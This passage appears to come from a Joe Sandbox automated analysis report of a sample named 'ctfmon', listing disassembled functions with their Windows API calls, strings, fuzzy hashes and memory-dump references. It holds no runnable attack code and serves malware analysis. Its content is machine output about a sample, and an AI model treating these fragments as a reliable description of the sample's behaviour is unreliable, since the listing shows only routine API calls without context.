Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Long$Parent$Visible
String ID:
API String ID: 3473418232-0
Opcode ID: ad1c60d7dd1bbe177aea25ad133d5d740d3cacff3b0c382cf55e85d750fcfac4
Instruction ID: ba862818f269e3aceee2273a44a1f29cc0207a7b62508aff36e6de7303c25c2b
Opcode Fuzzy Hash: ad1c60d7dd1bbe177aea25ad133d5d740d3cacff3b0c382cf55e85d750fcfac4
Instruction Fuzzy Hash: FD219072740724ABD731AB669C89F2FB2ACAF40754F44873ABD41B72D1C638DC0587A8

Function 00425B90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85stringtimeCOMMON

Download Yara Rule

APIs

lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,?,00425B7A,?), ref: 00425BBA
GetFileTime.KERNEL32(00000000,z[B,?,?,?,?,?,?,?,?,?,00425B7A,?), ref: 00425BDB
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00425B7A,?), ref: 00425BEA
GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00425B7A,?), ref: 00425C0B

Strings

z[B, xrefs: 00425B98, 00425C1D, 00425C2E, 00425C40, 00425BA5
z[B, xrefs: 00425BD6, 00425C18, 00425BD9, 00425C1C

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: File$AttributesSizeTimelstrcpyn
String ID: z[B$z[B
API String ID: 1499663573-648401610
Opcode ID: e76c36bad1554bebe900693a779f145176d16c0a690a29c8f3f1c0784b4361d4
Instruction ID: b0b1fca4624fb2a0d4a84746afc2279bc6a5ac128e51e5953a8924eafc8c791d
Opcode Fuzzy Hash: e76c36bad1554bebe900693a779f145176d16c0a690a29c8f3f1c0784b4361d4
Instruction Fuzzy Hash: 2B318072600615AFC720DFA1DCC5AABBBB8BB14310F504A2AF156D7280E774B989CB94

Function 0042725B Relevance: 10.6, APIs: 7, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 00427264
SendMessageW.USER32(00000000,00000365,00000000,00000000), ref: 00427281
GetFocus.USER32 ref: 00427293
SendMessageW.USER32(00000000,00000365,00000000,00000000), ref: 004272A3
GetLastActivePopup.USER32(?), ref: 004272C6
SendMessageW.USER32(00000000,00000365,00000000,00000000), ref: 004272D6
SendMessageW.USER32(?,00000111,0000E147,00000000), ref: 004272F5

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: 2cfbcd3abc8782fe34278c35964e10fb786888f8cf757bf9c0f9356a80920232
Instruction ID: 68473f9b5d7e177251982a610d2712512d6c7068ce16a05e5002633df34013cc
Opcode Fuzzy Hash: 2cfbcd3abc8782fe34278c35964e10fb786888f8cf757bf9c0f9356a80920232
Instruction Fuzzy Hash: 7011A076308229FBD6106A62FC84C3F7A6CDB827D9B9204AFF90193201DE299C06453E

Function 0041DF10 Relevance: 10.6, APIs: 7, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?), ref: 0041DF20
GetWindowLongA.USER32(?,000000F0), ref: 0041DF29
InflateRect.USER32(?,00000001,00000001), ref: 0041DF88
GetParent.USER32(?), ref: 0041DF8F
ScreenToClient.USER32(00000000,?), ref: 0041DFA3
ScreenToClient.USER32(00000000,?), ref: 0041DFAB
InvalidateRect.USER32(00000000,?,00000000), ref: 0041DFC1

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Rect$ClientScreenWindow$InflateInvalidateLongParent
String ID:
API String ID: 1809568455-0
Opcode ID: 58f5927d627f06ebdb3d6c3f4d4a38317ab9f67d64c63de6d6abd1e3eb937c86
Instruction ID: 5c4ce70eba9561d943b507e3d2f7660809a151edc0751f07b28f757fc8d36fc6
Opcode Fuzzy Hash: 58f5927d627f06ebdb3d6c3f4d4a38317ab9f67d64c63de6d6abd1e3eb937c86
Instruction Fuzzy Hash: BA218B72A00201AFD714DB14D8D4FBF73A9EF94760F40091EF95692291D738E986C76A

Function 00428D5C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00428D8A
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00428DAD
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00428DCC
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00428DDC
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00428DE6

Strings

software, xrefs: 00428D74

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 69adb2aea5cc14ec8ae342babbe5f54ff3db835e943cfe2388184d54ff1eedc4
Instruction ID: b72b22ee4a62b1fdbc469c719b3260cc0ea8d96049bfbdf274d8e70cb96c8cd0
Opcode Fuzzy Hash: 69adb2aea5cc14ec8ae342babbe5f54ff3db835e943cfe2388184d54ff1eedc4
Instruction Fuzzy Hash: 9A11E372E01128FBCB21CB9ADC84DEFFFBCEF95700F5000AAA504A2121D6709A05DBA4

Function 00427955 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 00427965
GetDeviceCaps.GDI32(?,00000058), ref: 0042799F
GetDeviceCaps.GDI32(?,0000005A), ref: 004279A8

Part of subcall function 0042657D: GetWindowExtEx.GDI32(?,00407774,00000000,?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042658E
Part of subcall function 0042657D: GetViewportExtEx.GDI32(?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042659B
Part of subcall function 0042657D: MulDiv.KERNEL32(00407774,00000000,00000000), ref: 004265C0
Part of subcall function 0042657D: MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 004265DB

MulDiv.KERNEL32(tw@,00000060,000009EC), ref: 004279CC
MulDiv.KERNEL32(00000002,?,000009EC), ref: 004279D7

Strings

tw@, xrefs: 004279B7, 00427980, 004279C1

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CapsDevice$ModeViewportWindow
String ID: tw@
API String ID: 2598972148-3122378559
Opcode ID: 30f29e222e4cb38219f326d3fb46cec9727d7915d3471bf8a7ceecbc678bfd42
Instruction ID: 92b9790e69b5446d6c958f7dd1d8ca38bdb3d9c6a46825f3b35b29f8475d5c98
Opcode Fuzzy Hash: 30f29e222e4cb38219f326d3fb46cec9727d7915d3471bf8a7ceecbc678bfd42
Instruction Fuzzy Hash: A3110E72700610EFEB21AF59DC44C2FBBA9EF89710B41402AE98587371C731AC82CF98

Function 0041DFD0 Relevance: 10.5, APIs: 7, Instructions: 42COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0041DFDD
GetWindowRect.USER32(?,?), ref: 0041DFEB
InflateRect.USER32(?,00000001,00000001), ref: 0041DFFA
GetParent.USER32(?), ref: 0041E001
ScreenToClient.USER32(00000000,?), ref: 0041E015
ScreenToClient.USER32(00000000,?), ref: 0041E01D
ValidateRect.USER32(00000000,?), ref: 0041E031

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Rect$ClientScreenWindow$InflateLongParentValidate
String ID:
API String ID: 2275295265-0
Opcode ID: a915bac04b4fb549f67fcc827fd90f6c4676513c8cc0a7a62b76d954d98b73d1
Instruction ID: 6b051f3026c86bdc512559a30bcbe6d5191d46f4b5e6e7f40c6fc7ebd371f8c1
Opcode Fuzzy Hash: a915bac04b4fb549f67fcc827fd90f6c4676513c8cc0a7a62b76d954d98b73d1
Instruction Fuzzy Hash: 91F08136100202BFD321EB54DCC8DBF77BCEBC9B24F404929F91592151D774A80A8B66

Function 00424D54 Relevance: 10.5, APIs: 7, Instructions: 29COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 00424D60
GetSysColor.USER32(00000010), ref: 00424D67
GetSysColor.USER32(00000014), ref: 00424D6E
GetSysColor.USER32(00000012), ref: 00424D75
GetSysColor.USER32(00000006), ref: 00424D7C
GetSysColorBrush.USER32(0000000F), ref: 00424D89
GetSysColorBrush.USER32(00000006), ref: 00424D90

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 92d1a130750778a343b254b49833808b75e99ffc954d900b7f748f2d3a603d37
Instruction ID: 18969bc28ed302142f8635eec16f63b65d63ba9001d0164203a570e39b19960d
Opcode Fuzzy Hash: 92d1a130750778a343b254b49833808b75e99ffc954d900b7f748f2d3a603d37
Instruction Fuzzy Hash: 1EF0F871A407489BD730AB729D49B4BBAE0FFC4B10F02092AD2858BA90E6B5F4419F44

Function 0042785C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25registryclipboardCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 00427869
GetVersion.KERNEL32 ref: 00427874
GetVersion.KERNEL32 ref: 0042787C
GetVersion.KERNEL32 ref: 00427882
RegisterClipboardFormatW.USER32(MSWHEEL_ROLLMSG), ref: 0042788F

Strings

MSWHEEL_ROLLMSG, xrefs: 0042788A

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Version$ClipboardFormatRegister
String ID: MSWHEEL_ROLLMSG
API String ID: 2888461884-2485103130
Opcode ID: e99812611a21f9011ea4a185b951aeef274692d9465cad14e96c1549da805e4a
Instruction ID: f412c579cb3b66504e538c215866e8624d94ca82ea27c6ff18154eccb9f95b5c
Opcode Fuzzy Hash: e99812611a21f9011ea4a185b951aeef274692d9465cad14e96c1549da805e4a
Instruction Fuzzy Hash: F4E0483AF15136D5D71137B4BD4876A25945B58351FE10077DA01433519A3C4483DB7E

Function 00428A0D Relevance: 9.1, APIs: 6, Instructions: 85memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,0053EDA8,00000000,?,00000000,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A18
EnterCriticalSection.KERNEL32(0000001C,00000010,?,00000000,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A67
LeaveCriticalSection.KERNEL32(0000001C,00000000,?,00000000,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A7A
LocalAlloc.KERNEL32(00000000,?,?,00000000,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A90
LocalReAlloc.KERNEL32(?,?,00000002,?,00000000,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428AA2
TlsSetValue.KERNEL32(00000000,00000000), ref: 00428ADE

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: AllocCriticalLocalSectionValue$EnterLeave
String ID:
API String ID: 4117633390-0
Opcode ID: 13d111e48e1bc65edc326abf01420470da07a7052a1c5e31779b3603b3111ea6
Instruction ID: 683b195803cd3318d752987fd83c5c11aee9b06666c6d2078921f9177f6cc79e
Opcode Fuzzy Hash: 13d111e48e1bc65edc326abf01420470da07a7052a1c5e31779b3603b3111ea6
Instruction Fuzzy Hash: 4F31AB31200615EFD724CF15D88AF6AB3A8FF44354F80892EE41AC7690DB74E816CB64

Function 0041F320 Relevance: 9.1, APIs: 6, Instructions: 83windowCOMMON

Download Yara Rule

APIs

PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041F348
GetWindowTextLengthA.USER32(?), ref: 0041F352
GetWindowTextA.USER32(?,00000000,00000000), ref: 0041F37A
SetTextColor.GDI32(?,?), ref: 0041F3BB
DrawTextA.USER32(?,00000000,000000FF,?,?), ref: 0041F3D3
SetTextColor.GDI32(?,?), ref: 0041F3E5

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Text$ColorWindow$DrawLength
String ID:
API String ID: 1177705772-0
Opcode ID: 85627abb918a3084de23618f61da1971933a665179132a7b318545b2f05277eb
Instruction ID: b26f12578afaccc9f8427d079972224ff864cef3ef88deb0b21f074a4f367360
Opcode Fuzzy Hash: 85627abb918a3084de23618f61da1971933a665179132a7b318545b2f05277eb
Instruction Fuzzy Hash: 6D215C76600108AFC724DF98DC84ABF77A9EF84321B148229FD1997390D634AD45CB64

Function 00422809 Relevance: 9.1, APIs: 6, Instructions: 82windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042280E
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 0042285B
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 0042287D
GetCapture.USER32 ref: 0042288F
SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 0042289E
WinHelpW.USER32(?,?,?,?), ref: 004228B2

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: MessageSend$CaptureH_prologHelp
String ID:
API String ID: 432264411-0
Opcode ID: 351ca17ef3e89ffa8c86497c2370513ed9314193ee064a8a9955204cf86f37c4
Instruction ID: 321176f5cdc229f6ee6c7f21b62b50d57b21ffd69a4491bdf23897e4f3332011
Opcode Fuzzy Hash: 351ca17ef3e89ffa8c86497c2370513ed9314193ee064a8a9955204cf86f37c4
Instruction Fuzzy Hash: 44219131340214BFEB30AF65DC89F6E7BA9EF04744F40456DB1019B1E2CB799C008624

Function 004271B3 Relevance: 9.1, APIs: 6, Instructions: 67COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004271E6
GetLastActivePopup.USER32(?), ref: 004271F5
IsWindowEnabled.USER32(?), ref: 0042720A
EnableWindow.USER32(?,00000000), ref: 0042721D
GetWindowLongW.USER32(?,000000F0), ref: 0042722F
GetParent.USER32(?), ref: 0042723D

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 829b2fd447a7a265a2830058b677b447dcf963bf07e075df5b6d77de7654244f
Instruction ID: b477ea236e12bf6e9f048e8246984b22bba05b7c439d68dba564573c6702b4fa
Opcode Fuzzy Hash: 829b2fd447a7a265a2830058b677b447dcf963bf07e075df5b6d77de7654244f
Instruction Fuzzy Hash: F811A332B093319787316A6ABD94B3B729C5F55B50FC501A6FD00E3301DB28DD1246BD

Function 0040FF4B Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF64
GetCommandLineA.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF76
GetCommandLineW.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF8D
GetCommandLineA.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF96
MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,0040D0B4), ref: 0040FFAF
MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,0040D0B4), ref: 0040FFD4

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CommandLine$ByteCharMultiWide
String ID:
API String ID: 3068183746-0
Opcode ID: 3c780290e16532da1a94cc39dc3a8878b2115943691280b670c6d4727a397ac2
Instruction ID: 64f274b490bb9753f35f974b03313c599961d3a4b4ccc6cea9b6a40c69df2725
Opcode Fuzzy Hash: 3c780290e16532da1a94cc39dc3a8878b2115943691280b670c6d4727a397ac2
Instruction Fuzzy Hash: E011C83270911B6BDA3057A69C40F2B369CDB533A4F210177F500F6BD0DAB5DC4956A9

Function 00402F20 Relevance: 9.0, APIs: 6, Instructions: 47synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000348,000000FF,?,?,0053CB68,00403D13,?,00000049), ref: 00402F3E
ResetEvent.KERNEL32(00000348,?,0053CB68,00403D13,?,00000049), ref: 00402F47
SetEvent.KERNEL32(0000034C,?,0053CB68,00403D13,?,00000049), ref: 00402F77
WaitForSingleObject.KERNEL32(0000034C,00000064,?,0053CB68,00403D13,?,00000049), ref: 00402F88
Sleep.KERNEL32(0000000A,?,0053CB68,00403D13,?,00000049), ref: 00402F93
SetEvent.KERNEL32(00000348,?,0053CB68,00403D13,?,00000049), ref: 00402F9E

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Event$ObjectSingleWait$ResetSleep
String ID:
API String ID: 3757991767-0
Opcode ID: c552385a51d22ba56084d703d5a1d3e4d9b6c6ab6055f6c746357635fa96cf77
Instruction ID: cce5b26dfa6e14c825b22c7865c66c1ad55053d17271cdbe5a1c1e3b5b80d322
Opcode Fuzzy Hash: c552385a51d22ba56084d703d5a1d3e4d9b6c6ab6055f6c746357635fa96cf77
Instruction Fuzzy Hash: 910171767002115BCA14DB68FD8491E73B9F79C7207540629E905A33E0CBB4E805DB74

Function 004269C5 Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 004269D4
GetWindow.USER32(?,00000005), ref: 004269E5
GetDlgCtrlID.USER32(00000000), ref: 004269EE
GetWindowLongW.USER32(00000000,000000F0), ref: 004269FD
GetWindowRect.USER32(00000000,?), ref: 00426A0F
PtInRect.USER32(?,?,?), ref: 00426A1F

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
